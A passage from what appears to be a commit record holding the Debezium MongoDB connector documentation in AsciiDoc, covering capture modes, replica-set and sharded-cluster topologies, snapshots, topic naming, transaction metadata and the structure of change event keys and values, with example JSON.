property docs\n","repos":"debezium\/debezium,debezium\/debezium,debezium\/debezium,debezium\/debezium","old_file":"documentation\/modules\/ROOT\/pages\/connectors\/mongodb.adoc","new_file":"documentation\/modules\/ROOT\/pages\/connectors\/mongodb.adoc","new_contents":"\/\/ Category: debezium-using\n\/\/ Type: assembly\n[id=\"debezium-connector-for-mongodb\"]\n= {prodname} connector for MongoDB\n\n:context: mongodb\n:data-collection: collection\n:mbean-name: {context}\n:connector-file: {context}\n:connector-class: MongoDb\n:connector-name: MongoDB\nifdef::community[]\n\n:toc:\n:toc-placement: macro\n:linkattrs:\n:icons: font\n:source-highlighter: highlight.js\n\ntoc::[]\nendif::community[]\n\n{prodname}'s MongoDB connector tracks a MongoDB replica set or a MongoDB sharded cluster for document changes in databases and collections, recording those changes as events in Kafka topics.\nThe connector automatically handles the addition or removal of shards in a sharded cluster, changes in membership of each replica set, elections within each replica set, and awaiting the resolution of communications problems.\n\nifdef::community[]\nFor information about the MongoDB versions that are compatible with this connector, see the link:https:\/\/debezium.io\/releases\/[{prodname} release overview].\nendif::community[]\nifdef::product[]\nFor information about the MongoDB versions that are compatible with this connector, see the link:{LinkDebeziumSupportedConfigurations}[{NameDebeziumSupportedConfigurations}].\nendif::product[]\n\nifdef::product[]\n\nInformation and procedures for using a {prodname} MongoDB connector is organized as follows:\n\n* xref:overview-of-debezium-mongodb-connector[]\n* xref:how-debezium-mongodb-connectors-work[]\n* xref:descriptions-of-debezium-mongodb-connector-data-change-events[]\n* xref:setting-up-mongodb-to-work-with-debezium[]\n* xref:deployment-of-debezium-mongodb-connectors[]\n* xref:monitoring-debezium-mongodb-connector-performance[]\n* xref:how-debezium-mongodb-connectors-handle-faults-and-problems[]\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ Title: Overview of {prodname} MongoDB connector\n\/\/ ModuleID: overview-of-debezium-mongodb-connector\n[[mongodb-overview]]\n== Overview\n\nMongoDB's replication mechanism provides redundancy and high availability, and is the preferred way to run MongoDB in production.\nMongoDB connector captures the changes in a replica set or sharded cluster.\n\nA MongoDB _replica set_ consists of a set of servers that all have copies of the same data, and replication ensures that all changes made by clients to documents on the replica set's _primary_ are correctly applied to the other replica set's servers, called _secondaries_.\nMongoDB replication works by having the primary record the changes in its _oplog_ (or operation log), and then each of the secondaries reads the primary's oplog and applies in order all of the operations to their own documents.\nWhen a new server is added to a replica set, that server first performs an https:\/\/docs.mongodb.com\/manual\/core\/replica-set-sync\/[snapshot] of all of the databases and collections on the primary, and then reads the primary's oplog to apply all changes that might have been made since it began the snapshot.\nThis new server becomes a secondary (and able to handle queries) when it catches up to the tail of the primary's oplog.\n\nMongoDB connector supports two distinct modes of capturing the changes controlled by the xref:mongodb-property-capture-mode[`capture.mode`] option:\n\n* oplog based\n* change streams based\n\n'''\n\n=== Oplog capture mode (legacy)\n\nThe {prodname} MongoDB connector uses the same replication mechanism as described above, though it does not actually become a member of the replica set.\nJust like MongoDB secondaries, however, the connector always reads the oplog of the replica set's primary.\nAnd, when the connector sees a replica set for the first time, it looks at the oplog to get the last recorded transaction and then performs a snapshot of the primary's databases and collections.\nWhen all the data is copied, the connector then starts streaming changes from the position it read earlier from the oplog. Operations in the MongoDB oplog are https:\/\/docs.mongodb.com\/manual\/core\/replica-set-oplog\/[idempotent], so no matter how many times the operations are applied, they result in the same end state.\n\nThe disadvantage of this mode is that only _insert_ change events will contain the full document, whereas _update_ events only contain a representation of changed fields (i.e. unmodified fields cannot be obtained from an _update_ event), and _delete_ events contain no representation of the deleted document apart from its key.\n\nThis mode should be considered as the legacy one.\nIt is not supported on MongoDB 5 and the user is strongly advised to not use it for MongoDB 4.x server.\n\n=== Change Stream mode\n\nThe {prodname} MongoDB connector uses a similar replication mechanism to the one described above, though it does not actually become a member of the replica set.\nThe main difference is that the connector does not read the oplog directly, but delegates capturing and decoding the oplog to MongoDB's https:\/\/docs.mongodb.com\/manual\/changeStreams\/[Change Streams] feature.\nWith change streams, the MongoDB server exposes changes to collections as an event stream.\nThe {prodname} connector watches the stream and delivers the changes downstream.\nAnd, when the connector sees a replica set for the first time, it looks at the oplog to get the last recorded transaction and then performs a snapshot of the primary's databases and collections.\nWhen all the data is copied, the connector then creates a change stream from the position it read earlier from the oplog.\n\nThis is the recommended mode starting with MongoDB 4.x.\n\n[WARNING]\n====\nBoth capture modes use different values stored in offsets that allow them to resume streaming from the last position seen after a connector restart.\nThus it is not possible to switch from the change streams mode to the oplog mode.\nTo prevent any inadvertent capture mode changes, the connector has a built-in safety check.\n\nWhen the connector is started it checks the stored offsets.\nIf the original capture mode was oplog-based and the new mode is change streams based, then it will try to migrate to change streams.\nIf the original capture mode was change streams based, it will keep using change streams, also if the new mode is oplog-based, and a warning about this will be emitted to the logs.\n====\n\nAs the MongoDB connector processes changes, it periodically records the position in the oplog\/stream where the event originated.\nWhen the connector stops, it records the last oplog\/stream position that it processed, so that upon restart it simply begins streaming from that position.\nIn other words, the connector can be stopped, upgraded or maintained, and restarted some time later, and it will pick up exactly where it left off without losing a single event.\nOf course, MongoDB's oplogs are usually capped at a maximum size, which means that the connector should not be stopped for too long, or else some of the operations in the oplog might be purged before the connector has a chance to read them.\nIn this case, upon restart the connector will detect the missing oplog operations, perform a snapshot, and then proceed with streaming the changes.\n\nThe MongoDB connector is also quite tolerant of changes in membership and leadership of the replica sets, of additions or removals of shards within a sharded cluster, and network problems that might cause communication failures.\nThe connector always uses the replica set's primary node to stream changes, so when the replica set undergoes an election and a different node becomes primary, the connector will immediately stop streaming changes, connect to the new primary, and start streaming changes using the new primary node.\nLikewise, if connector experiences any problems communicating with the replica set primary, it will try to reconnect (using exponential backoff so as to not overwhelm the network or replica set) and continue streaming changes from where it last left off.\nIn this way the connector is able to dynamically adjust to changes in replica set membership and to automatically handle communication failures.\n\n.Additional resources\n\n* link:https:\/\/docs.mongodb.com\/manual\/replication\/[Replication mechanism]\n* link:https:\/\/docs.mongodb.com\/manual\/tutorial\/deploy-replica-set\/[Replica set]\n* link:https:\/\/docs.mongodb.com\/manual\/core\/replica-set-elections\/[Replica set elections]\n* link:https:\/\/docs.mongodb.com\/manual\/core\/sharded-cluster-components\/[Sharded cluster]\n* link:https:\/\/docs.mongodb.com\/manual\/tutorial\/add-shards-to-shard-cluster\/[Shard addition]\n* link:https:\/\/docs.mongodb.com\/manual\/tutorial\/remove-shards-from-cluster\/[Shard removal]\n* link:https:\/\/docs.mongodb.com\/manual\/changeStreams\/[Change Streams]\n\n\/\/ Type: assembly\n\/\/ ModuleID: how-debezium-mongodb-connectors-work\n\/\/ Title: How {prodname} MongoDB connectors work\n[[how-the-mongodb-connector-works]]\n== How the MongoDB connector works\n\nAn overview of the MongoDB topologies that the connector supports is useful for planning your application.\n\nWhen a MongoDB connector is configured and deployed, it starts by connecting to the MongoDB servers at the seed addresses, and determines the details about each of the available replica sets.\nSince each replica set has its own independent oplog, the connector will try to use a separate task for each replica set.\nThe connector can limit the maximum number of tasks it will use, and if not enough tasks are available the connector will assign multiple replica sets to each task, although the task will still use a separate thread for each replica set.\n\n[NOTE]\n====\nWhen running the connector against a sharded cluster, use a value of `tasks.max` that is greater than the number of replica sets.\nThis will allow the connector to create one task for each replica set, and will let Kafka Connect coordinate, distribute, and manage the tasks across all of the available worker processes.\n====\n\nifdef::product[]\nThe following topics provide details about how the {prodname} MongoDB connector works:\n\n* xref:mongodb-topologies-supported-by-debezium-connectors[]\n* xref:how-debezium-mongodb-connectors-use-logical-names-for-replica-sets-and-sharded-clusters[]\n* xref:how-debezium-mongodb-connectors-perform-snapshots[]\n* xref:how-the-debezium-mongodb-connector-streams-change-event-records[]\n* xref:default-names-of-kafka-topics-that-receive-debezium-mongodb-change-event-records[]\n* xref:how-event-keys-control-topic-partitioning-for-the-debezium-mongodb-connector[]\n* xref:debezium-mongodb-connector-generated-events-that-represent-transaction-boundaries[]\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ ModuleID: mongodb-topologies-supported-by-debezium-connectors\n\/\/ Title: MongoDB topologies supported by {prodname} connectors\n[[supported-mongodb-topologies]]\n=== Supported MongoDB topologies\n\nThe MongoDB connector supports the following MongoDB topologies:\n\n[[mongodb-replicaset]]\nMongoDB replica set::\nThe {prodname} MongoDB connector can capture changes from a single https:\/\/docs.mongodb.com\/manual\/replication\/[MongoDB replica set].\nProduction replica sets require a minimum of https:\/\/docs.mongodb.com\/manual\/core\/replica-set-architecture-three-members\/[at least three members].\n+\nTo use the MongoDB connector with a replica set, provide the addresses of one or more replica set servers as _seed addresses_ through the connector's `mongodb.hosts` property.\nThe connector will use these seeds to connect to the replica set, and then once connected will get from the replica set the complete set of members and which member is primary.\nThe connector will start a task to connect to the primary and capture the changes from the primary's oplog.\nWhen the replica set elects a new primary, the task will automatically switch over to the new primary.\n+\n[NOTE]\n====\nWhen MongoDB is fronted by a proxy (such as with Docker on OS X or Windows), then when a client connects to the replica set and discovers the members, the MongoDB client will exclude the proxy as a valid member and will attempt and fail to connect directly to the members rather than go through the proxy.\n\nIn such a case, set the connector's optional `mongodb.members.auto.discover` configuration property to `false` to instruct the connector to forgo membership discovery and instead simply use the first seed address (specified via the `mongodb.hosts` property) as the primary node.\nThis may work, but still make cause issues when election occurs.\n====\n\n[[mongodb-sharded-cluster]]\nMongoDB sharded cluster::\nA https:\/\/docs.mongodb.com\/manual\/sharding\/[MongoDB sharded cluster] consists of:\n* One or more _shards_, each deployed as a replica set;\n* A separate replica set that acts as the cluster's _configuration server_\n* One or more _routers_ (also called `mongos`) to which clients connect and that routes requests to the appropriate shards\n+\nTo use the MongoDB connector with a sharded cluster, configure the connector with the host addresses of the _configuration server_ replica set. When the connector connects to this replica set, it discovers that it is acting as the configuration server for a sharded cluster, discovers the information about each replica set used as a shard in the cluster, and will then start up a separate task to capture the changes from each replica set. If new shards are added to the cluster or existing shards removed, the connector will automatically adjust its tasks accordingly.\n\n[[mongodb-standalone-server]]\nMongoDB standalone server::\nThe MongoDB connector is not capable of monitoring the changes of a standalone MongoDB server, since standalone servers do not have an oplog.\nThe connector will work if the standalone server is converted to a replica set with one member.\n\n[NOTE]\n====\nMongoDB does not recommend running a standalone server in production.\nFor more information, see the https:\/\/docs.mongodb.com\/manual\/core\/replica-set-architectures\/[MongoDB documentation].\n====\n\n\/\/ Type: concept\n\/\/ Title: How {prodname} MongoDB connectors use logical names for replica sets and sharded clusters\n\/\/ ModuleID: how-debezium-mongodb-connectors-use-logical-names-for-replica-sets-and-sharded-clusters\n[[mongodb-logical-connector-name]]\n=== Logical connector name\n\nThe connector configuration property `mongodb.name` serves as a _logical name_ for the MongoDB replica set or sharded cluster.\nThe connector uses the logical name in a number of ways: as the prefix for all topic names, and as a unique identifier when recording the oplog\/change stream position of each replica set.\n\nYou should give each MongoDB connector a unique logical name that meaningfully describes the source MongoDB system.\nWe recommend logical names begin with an alphabetic or underscore character, and remaining characters that are alphanumeric or underscore.\n\n\/\/ Type: concept\n\/\/ Title: How {prodname} MongoDB connectors perform snapshots\n\/\/ ModuleID: how-debezium-mongodb-connectors-perform-snapshots\n[[mongodb-performing-a-snapshot]]\n=== Performing a snapshot\n\nWhen a task starts up using a replica set, it uses the connector's logical name and the replica set name to find an _offset_ that describes the position where the connector previously stopped reading changes.\nIf an offset can be found and it still exists in the oplog, then the task immediately proceeds with xref:{link-mongodb-connector}#mongodb-streaming-changes[streaming changes], starting at the recorded offset position.\n\nHowever, if no offset is found or if the oplog no longer contains that position, the task must first obtain the current state of the replica set contents by performing a _snapshot_.\nThis process starts by recording the current position of the oplog and recording that as the offset (along with a flag that denotes a snapshot has been started).\nThe task will then proceed to copy each collection, spawning as many threads as possible (up to the value of the `snapshot.max.threads` configuration property) to perform this work in parallel.\nThe connector will record a separate _read event_ for each document it sees, and that read event will contain the object's identifier, the complete state of the object, and _source_ information about the MongoDB replica set where the object was found.\nThe source information will also include a flag that denotes the event was produced during a snapshot.\n\nThis snapshot will continue until it has copied all collections that match the connector's filters.\nIf the connector is stopped before the tasks' snapshots are completed, upon restart the connector begins the snapshot again.\n\n[NOTE]\n====\nTry to avoid task reassignment and reconfiguration while the connector performs snapshots of any replica sets.\nThe connector generates log messages to report on the progress of the snapshot.\nTo provide for the greatest control, run a separate Kafka Connect cluster for each connector.\n====\n\n\/\/ Type: concept\n[id=\"mongodb-ad-hoc-snapshots\"]\n==== Ad hoc snapshots\n\nifdef::product[]\n[IMPORTANT]\n====\nAd hoc snapshots are a Technology Preview feature for the {prodname} MongoDB connector.\nTechnology Preview features are not supported with Red Hat production service-level agreements (SLAs) and might not be functionally complete;\ntherefore, Red Hat does not recommend implementing any Technology Preview features in production environments.\nThis Technology Preview feature provides early access to upcoming product innovations, enabling you to test functionality and provide feedback during the development process.\nFor more information about support scope, see link:https:\/\/access.redhat.com\/support\/offerings\/techpreview\/[Technology Preview Features Support Scope].\n====\nendif::product[]\ninclude::{partialsdir}\/modules\/all-connectors\/con-connector-ad-hoc-snapshots.adoc[leveloffset=+3]\n\n\/\/ Type: concept\n[id=\"mongodb-incremental-snapshots\"]\n==== Incremental snapshots\n\nifdef::product[]\n[IMPORTANT]\n====\nIncremental snapshots are a Technology Preview feature for the {prodname} MongoDB connector.\nTechnology Preview features are not supported with Red Hat production service-level agreements (SLAs) and might not be functionally complete;\ntherefore, Red Hat does not recommend implementing any Technology Preview features in production environments.\nThis Technology Preview feature provides early access to upcoming product innovations, enabling you to test functionality and provide feedback during the development process.\nFor more information about support scope, see link:https:\/\/access.redhat.com\/support\/offerings\/techpreview\/[Technology Preview Features Support Scope].\n====\nendif::product[]\ninclude::{partialsdir}\/modules\/all-connectors\/con-connector-incremental-snapshot.adoc[leveloffset=+3]\n\n[NOTE]\n====\nIncremental snapshots are currently supported for single replica set deployments only.\nifdef::community[]\nThis limitation will be removed in the next version.\nendif::community[]\n====\n\n\/\/ Type: concept\n\/\/ ModuleID: how-the-debezium-mongodb-connector-streams-change-event-records\n\/\/ Title: How the {prodname} MongoDB connector streams change event records\n[[mongodb-streaming-changes]]\n=== Streaming changes\n[[mongodb-tailing-the-oplog]]\n\nAfter the connector task for a replica set records an offset, it uses the offset to determine the position in the oplog where it should start streaming changes.\nThe task then (depending on the configuration) either connects to the replica set's primary node or connects to a replica-set-wide change stream and starts streaming changes from that position.\nIt processes all of create, insert, and delete operations, and converts them into {prodname} xref:{link-mongodb-connector}#mongodb-events[change events].\nEach change event includes the position in the oplog where the operation was found, and the connector periodically records this as its most recent offset.\nThe interval at which the offset is recorded is governed by link:https:\/\/kafka.apache.org\/documentation\/#offset.flush.interval.ms[`offset.flush.interval.ms`], which is a Kafka Connect worker configuration property.\n\nWhen the connector is stopped gracefully, the last offset processed is recorded so that, upon restart, the connector will continue exactly where it left off.\nIf the connector's tasks terminate unexpectedly, however, then the tasks may have processed and generated events after it last records the offset but before the last offset is recorded; upon restart, the connector begins at the last _recorded_ offset, possibly generating some the same events that were previously generated just prior to the crash.\n\n[NOTE]\n====\nWhen everything is operating nominally, Kafka consumers will actually see every message *_exactly once_*. However, when things go wrong Kafka can only guarantee consumers will see every message *_at least once_*. Therefore, your consumers need to anticipate seeing messages more than once.\n====\n\nAs mentioned above, the connector tasks always use the replica set's primary node to stream changes from the oplog, ensuring that the connector sees the most up-to-date operations as possible and can capture the changes with lower latency than if secondaries were to be used instead. When the replica set elects a new primary, the connector immediately stops streaming changes, connects to the new primary, and starts streaming changes from the new primary node at the same position. Likewise, if the connector experiences any problems communicating with the replica set members, it tries to reconnect, by using exponential backoff so as to not overwhelm the replica set, and once connected it continues streaming changes from where it last left off. In this way, the connector is able to dynamically adjust to changes in replica set membership and automatically handle communication failures.\n\nTo summarize, the MongoDB connector continues running in most situations. Communication problems might cause the connector to wait until the problems are resolved.\n\n\/\/ Type: concept\n\/\/ ModuleID: default-names-of-kafka-topics-that-receive-debezium-mongodb-change-event-records\n\/\/ Title: Default names of Kafka topics that receive {prodname} MongoDB change event records\n[[mongodb-topic-names]]\n=== Topic names\n\nThe MongoDB connector writes events for all insert, update, and delete operations to documents in each collection to a single Kafka topic.\nThe name of the Kafka topics always takes the form _logicalName_._databaseName_._collectionName_, where _logicalName_ is the xref:{link-mongodb-connector}#mongodb-logical-connector-name[logical name] of the connector as specified with the `mongodb.name` configuration property, _databaseName_ is the name of the database where the operation occurred, and _collectionName_ is the name of the MongoDB collection in which the affected document existed.\n\nFor example, consider a MongoDB replica set with an `inventory` database that contains four collections: `products`, `products_on_hand`, `customers`, and `orders`.\nIf the connector monitoring this database were given a logical name of `fulfillment`, then the connector would produce events on these four Kafka topics:\n\n* `fulfillment.inventory.products`\n* `fulfillment.inventory.products_on_hand`\n* `fulfillment.inventory.customers`\n* `fulfillment.inventory.orders`\n\nNotice that the topic names do not incorporate the replica set name or shard name.\nAs a result, all changes to a sharded collection (where each shard contains a subset of the collection's documents) all go to the same Kafka topic.\n\nYou can set up Kafka to {link-kafka-docs}.html#basic_ops_add_topic[auto-create] the topics as they are needed.\nIf not, then you must use Kafka administration tools to create the topics before starting the connector.\n\n\/\/ Type: concept\n\/\/ ModuleID: how-event-keys-control-topic-partitioning-for-the-debezium-mongodb-connector\n\/\/ Title: How event keys control topic partitioning for the {prodname} MongoDB connector\n[[mongodb-partitions]]\n=== Partitions\n\nThe MongoDB connector does not make any explicit determination about how to partition topics for events.\nInstead, it allows Kafka to determine how to partition topics based on event keys.\nYou can change Kafka's partitioning logic by defining the name of the `Partitioner` implementation in the Kafka Connect worker configuration.\n\nKafka maintains total order only for events written to a single topic partition.\nPartitioning the events by key does mean that all events with the same key always go to the same partition.\nThis ensures that all events for a specific document are always totally ordered.\n\n\n\/\/ Type: concept\n\/\/ ModuleID: debezium-mongodb-connector-generated-events-that-represent-transaction-boundaries\n\/\/ Title: {prodname} MongoDB connector-generated events that represent transaction boundaries\n[[mongodb-transaction-metadata]]\n=== Transaction Metadata\n\n{prodname} can generate events that represents transaction metadata boundaries and enrich change data event messages.\n\n[NOTE]\n.Limits on when {prodname} receives transaction metadata\n====\n{prodname} registers and receives metadata only for transactions that occur after you deploy the connector.\nMetadata for transactions that occur before you deploy the connector is not available.\n====\n\nFor every transaction `BEGIN` and `END`, {prodname} generates an event that contains the following fields:\n\n`status`:: `BEGIN` or `END`\n`id`:: String representation of unique transaction identifier.\n`event_count` (for `END` events):: Total number of events emitted by the transaction.\n`data_collections` (for `END` events):: An array of pairs of `data_collection` and `event_count` that provides number of events emitted by changes originating from given data collection.\n\nThe following example shows a typical message:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"status\": \"BEGIN\",\n \"id\": \"1462833718356672513\",\n \"event_count\": null,\n \"data_collections\": null\n}\n\n{\n \"status\": \"END\",\n \"id\": \"1462833718356672513\",\n \"event_count\": 2,\n \"data_collections\": [\n {\n \"data_collection\": \"rs0.testDB.collectiona\",\n \"event_count\": 1\n },\n {\n \"data_collection\": \"rs0.testDB.collectionb\",\n \"event_count\": 1\n }\n ]\n}\n----\n\nUnless overridden via the xref:{link-mongodb-connector}#mongodb-property-topic-transaction[`topic.transaction`] option,\ntransaction events are written to the topic named xref:mongodb-property-mongodb-name[`_<mongodb.name>_`]`.transaction`.\n\n.Change data event enrichment\nWhen transaction metadata is enabled, the data message `Envelope` is enriched with a new `transaction` field.\nThis field provides information about every event in the form of a composite of fields:\n\n`id`:: String representation of unique transaction identifier.\n`total_order`:: The absolute position of the event among all events generated by the transaction.\n`data_collection_order`:: The per-data collection position of the event among all events that were emitted by the transaction.\n\nFollowing is an example of what a message looks like:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"patch\": null,\n \"after\": \"{\\\"_id\\\" : {\\\"$numberLong\\\" : \\\"1004\\\"},\\\"first_name\\\" : \\\"Anne\\\",\\\"last_name\\\" : \\\"Kretchmar\\\",\\\"email\\\" : \\\"annek@noanswer.org\\\"}\",\n \"source\": {\n...\n },\n \"op\": \"c\",\n \"ts_ms\": \"1580390884335\",\n \"transaction\": {\n \"id\": \"1462833718356672513\",\n \"total_order\": \"1\",\n \"data_collection_order\": \"1\"\n }\n}\n----\n\n\/\/ Type: assembly\n\/\/ ModuleID: descriptions-of-debezium-mongodb-connector-data-change-events\n\/\/ Title: Descriptions of {prodname} MongoDB connector data change events\n[[mongodb-events]]\n== Data change events\n\nThe {prodname} MongoDB connector generates a data change event for each document-level operation that inserts, updates, or deletes data. Each event contains a key and a value. The structure of the key and the value depends on the collection that was changed.\n\n{prodname} and Kafka Connect are designed around _continuous streams of event messages_. However, the structure of these events may change over time, which can be difficult for consumers to handle. To address this, each event contains the schema for its content or, if you are using a schema registry, a schema ID that a consumer can use to obtain the schema from the registry. This makes each event self-contained.\n\nThe following skeleton JSON shows the basic four parts of a change event. However, how you configure the Kafka Connect converter that you choose to use in your application determines the representation of these four parts in change events. A `schema` field is in a change event only when you configure the converter to produce it. Likewise, the event key and event payload are in a change event only if you configure a converter to produce it. If you use the JSON converter and you configure it to produce all four basic change event parts, change events have this structure:\n\n[source,json,index=0]\n----\n{\n \"schema\": { \/\/ <1>\n ...\n },\n \"payload\": { \/\/ <2>\n ...\n },\n \"schema\": { \/\/ <3>\n ...\n },\n \"payload\": { \/\/ <4>\n ...\n },\n}\n----\n\n.Overview of change event basic content\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The first `schema` field is part of the event key. It specifies a Kafka Connect schema that describes what is in the event key's `payload` portion. In other words, the first `schema` field describes the structure of the key for the document that was changed.\n\n|2\n|`payload`\n|The first `payload` field is part of the event key. It has the structure described by the previous `schema` field and it contains the key for the document that was changed.\n\n|3\n|`schema`\n|The second `schema` field is part of the event value. It specifies the Kafka Connect schema that describes what is in the event value's `payload` portion. In other words, the second `schema` describes the structure of the document that was changed. Typically, this schema contains nested schemas.\n\n|4\n|`payload`\n|The second `payload` field is part of the event value. It has the structure described by the previous `schema` field and it contains the actual data for the document that was changed.\n\n|===\n\nBy default, the connector streams change event records to topics with names that are the same as the event's originating collection. See xref:{link-mongodb-connector}#mongodb-topic-names[topic names].\n\n[WARNING]\n====\nThe MongoDB connector ensures that all Kafka Connect schema names adhere to the link:http:\/\/avro.apache.org\/docs\/current\/spec.html#names[Avro schema name format]. This means that the logical server name must start with a Latin letter or an underscore, that is, a-z, A-Z, or \\_. Each remaining character in the logical server name and each character in the database and collection names must be a Latin letter, a digit, or an underscore, that is, a-z, A-Z, 0-9, or \\_. If there is an invalid character it is replaced with an underscore character.\n\nThis can lead to unexpected conflicts if the logical server name, a database name, or a collection name contains invalid characters, and the only characters that distinguish names from one another are invalid and thus replaced with underscores.\n====\n\n\nifdef::product[]\nFor more information, see the following topics:\n\n* xref:about-keys-in-debezium-mongodb-change-events[]\n* xref:about-values-in-debezium-mongodb-change-events[]\nendif::product[]\n\n\n\/\/ Type: concept\n\/\/ ModuleID: about-keys-in-debezium-mongodb-change-events\n\/\/ Title: About keys in {prodname} MongoDB change events\n[[mongodb-change-events-key]]\n=== Change event keys\n\nA change event's key contains the schema for the changed document's key and the changed document's actual key. For a given collection, both the schema and its corresponding payload contain a single `id` field.\nThe value of this field is the document's identifier represented as a string that is derived from link:https:\/\/docs.mongodb.com\/manual\/reference\/mongodb-extended-json\/[MongoDB extended JSON serialization strict mode].\n\nConsider a connector with a logical name of `fulfillment`, a replica set containing an `inventory` database, and a `customers` collection that contains documents such as the following.\n\n.Example document\n[source,json,indent=0]\n----\n {\n \"_id\": 1004,\n \"first_name\": \"Anne\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n }\n----\n\n.Example change event key\nEvery change event that captures a change to the `customers` collection has the same event key schema. For as long as the `customers` collection has the previous definition, every change event that captures a change to the `customers` collection has the following key structure. In JSON, it looks like this:\n\n[source,json,indent=0]\n----\n {\n \"schema\": { \/\/ <1>\n \"type\": \"struct\",\n \"name\": \"fulfillment.inventory.customers.Key\", \/\/ <2>\n \"optional\": false, \/\/ <3>\n \"fields\": [ \/\/ <4>\n {\n \"field\": \"id\",\n \"type\": \"string\",\n \"optional\": false\n }\n ]\n },\n \"payload\": { \/\/ <5>\n \"id\": \"1004\"\n }\n }\n----\n\n.Description of change event key\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The schema portion of the key specifies a Kafka Connect schema that describes what is in the key's `payload` portion.\n\n|2\n|`fulfillment.inventory.customers.Key`\na|Name of the schema that defines the structure of the key's payload. This schema describes the structure of the key for the document that was changed. Key schema names have the format _connector-name_._database-name_._collection-name_.`Key`. In this example: +\n\n* `fulfillment` is the name of the connector that generated this event. +\n* `inventory` is the database that contains the collection that was changed. +\n* `customers` is the collection that contains the document that was updated.\n\n|3\n|`optional`\n|Indicates whether the event key must contain a value in its `payload` field. In this example, a value in the key's payload is required. A value in the key's payload field is optional when a document does not have a key.\n\n|4\n|`fields`\n|Specifies each field that is expected in the `payload`, including each field's name, type, and whether it is required.\n\n|5\n|`payload`\n|Contains the key for the document for which this change event was generated. In this example, the key contains a single `id` field of type `string` whose value is `1004`.\n\n|===\n\nThis example uses a document with an integer identifier, but any valid MongoDB document identifier works the same way, including a document identifier. For a document identifier, an event key's `payload.id` value is a string that represents the updated document's original `_id` field as a MongoDB extended JSON serialization that uses strict mode. The following table provides examples of how different types of `_id` fields are represented.\n\n.Examples of representing document `_id` fields in event key payloads\n[options=\"header\",role=\"code-wordbreak-col2 code-wordbreak-col3\"]\n|===\n|Type |MongoDB `_id` Value|Key's payload\n|Integer |1234|`{ \"id\" : \"1234\" }`\n|Float |12.34|`{ \"id\" : \"12.34\" }`\n|String |\"1234\"|`{ \"id\" : \"\\\"1234\\\"\" }`\n|Document|`{ \"hi\" : \"kafka\", \"nums\" : [10.0, 100.0, 1000.0] }`|`{ \"id\" : \"{\\\"hi\\\" : \\\"kafka\\\", \\\"nums\\\" : [10.0, 100.0, 1000.0]}\" }`\n|ObjectId |`ObjectId(\"596e275826f08b2730779e1f\")`|`{ \"id\" : \"{\\\"$oid\\\" : \\\"596e275826f08b2730779e1f\\\"}\" }`\n|Binary |`BinData(\"a2Fma2E=\",0)`|`{ \"id\" : \"{\\\"$binary\\\" : \\\"a2Fma2E=\\\", \\\"$type\\\" : \\\"00\\\"}\" }`\n|===\n\n\/\/ Type: concept\n\/\/ ModuleID: about-values-in-debezium-mongodb-change-events\n\/\/ Title: About values in {prodname} MongoDB change events\n[[mongodb-change-events-value]]\n=== Change event values\n\nThe value in a change event is a bit more complicated than the key. Like the key, the value has a `schema` section and a `payload` section. The `schema` section contains the schema that describes the `Envelope` structure of the `payload` section, including its nested fields. Change events for operations that create, update or delete data all have a value payload with an envelope structure.\n\nConsider the same sample document that was used to show an example of a change event key:\n\n\n.Example document\n[source,json,indent=0]\n----\n {\n \"_id\": 1004,\n \"first_name\": \"Anne\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n }\n----\n\nThe value portion of a change event for a change to this document is described for each event type:\n\n* <<mongodb-create-events,_create_ events>>\n* <<mongodb-update-events,_update_ events>>\n* <<mongodb-delete-events,_delete_ events>>\n* <<mongodb-tombstone-events,Tombstone events>>\n\n[id=\"mongodb-create-events\"]\n=== _create_ events\n\nThe following example shows the value portion of a change event that the connector generates for an operation that creates data in the `customers` collection:\n\n[source,json,options=\"nowrap\",indent=0,subs=\"+attributes\"]\n----\n{\n \"schema\": { \/\/ <1>\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"string\",\n \"optional\": true,\n \"name\": \"io.debezium.data.Json\", \/\/ <2>\n \"version\": 1,\n \"field\": \"after\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"name\": \"io.debezium.data.Json\",\n \"version\": 1,\n \"field\": \"patch\"\n },\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"version\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"connector\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"name\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"ts_ms\"\n },\n {\n \"type\": \"boolean\",\n \"optional\": true,\n \"default\": false,\n \"field\": \"snapshot\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"db\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"rs\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"collection\"\n },\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"ord\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"h\"\n }\n ],\n \"optional\": false,\n \"name\": \"io.debezium.connector.mongo.Source\", \/\/ <3>\n \"field\": \"source\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"op\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"ts_ms\"\n }\n ],\n \"optional\": false,\n \"name\": \"dbserver1.inventory.customers.Envelope\" \/\/ <4>\n },\n \"payload\": { \/\/ <5>\n \"after\": \"{\\\"_id\\\" : {\\\"$numberLong\\\" : \\\"1004\\\"},\\\"first_name\\\" : \\\"Anne\\\",\\\"last_name\\\" : \\\"Kretchmar\\\",\\\"email\\\" : \\\"annek@noanswer.org\\\"}\", \/\/ <6>\n \"patch\": null,\n \"source\": { \/\/ <7>\n \"version\": \"{debezium-version}\",\n \"connector\": \"mongodb\",\n \"name\": \"fulfillment\",\n \"ts_ms\": 1558965508000,\n \"snapshot\": false,\n \"db\": \"inventory\",\n \"rs\": \"rs0\",\n \"collection\": \"customers\",\n \"ord\": 31,\n \"h\": 1546547425148721999\n 